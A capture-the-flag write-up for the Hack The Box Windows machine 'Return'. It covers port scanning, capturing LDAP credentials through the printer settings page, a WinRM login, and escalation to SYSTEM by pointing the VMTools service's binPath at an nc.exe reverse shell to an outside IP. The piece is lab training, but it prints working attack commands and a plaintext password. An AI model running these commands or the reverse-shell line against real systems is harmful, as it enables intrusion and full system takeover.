ReturnOctober 21, 2025 Created by Page Difficulty OS MrR3boot Hack The Box Easy Windows Enumeration I began with a full TCP port scan, followed by a service and version detection scan on the discovered open ports nmap -p- --open -vvv --min-rate 3000 -Pn -sS 10.10.11.108 -oG scan /opt/extractports scan nmap -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49674,49675,49679,49682,49697 -sCV 10.10.11.108 -oN ports I found the domain return.local and I add it to the file in the hosts file. Using dig, I enumerated subdomains: dig any @10.10.11.108 return.local From the scan, I discovered the domain return.local and added it to my /etc/hosts file. Initial Access (Web Enumeration) Within the website’s settings, I found a configuration containing a server address, port, username, and password. I modified the server address to point to my machine and the port to 80. I set up a local web service to capture incoming requests and clicked the update button. This exposed the credentials in plaintext. I verified the credentials using netexec: netexec ldap 10.10.11.108 -u 'svc-printer' -p '1edFg43012!!' With valid credentials, I connected via WinRM and retrieved the first flag: evil-winrm -i 10.10.11.108 -u 'svc-printer' -p '1edFg43012!!' Privilege Escalation I enumerated the user’s permissions and group memberships: whoami /all Being a member of the Server Operators group, I exploited the ability to modify a service binary path. I configured the VMTools service to execute a reverse shell: sc.exe config VMTools binPath="C:\Users\aarti\Documents\nc.exe -e cmd.exe 192.168.1.205 1234" I then restarted the service: sc.exe stop VMTools sc.exe start VMTools This granted me a shell as NT AUTHORITY\SYSTEM, allowing me to retrieve the root flag.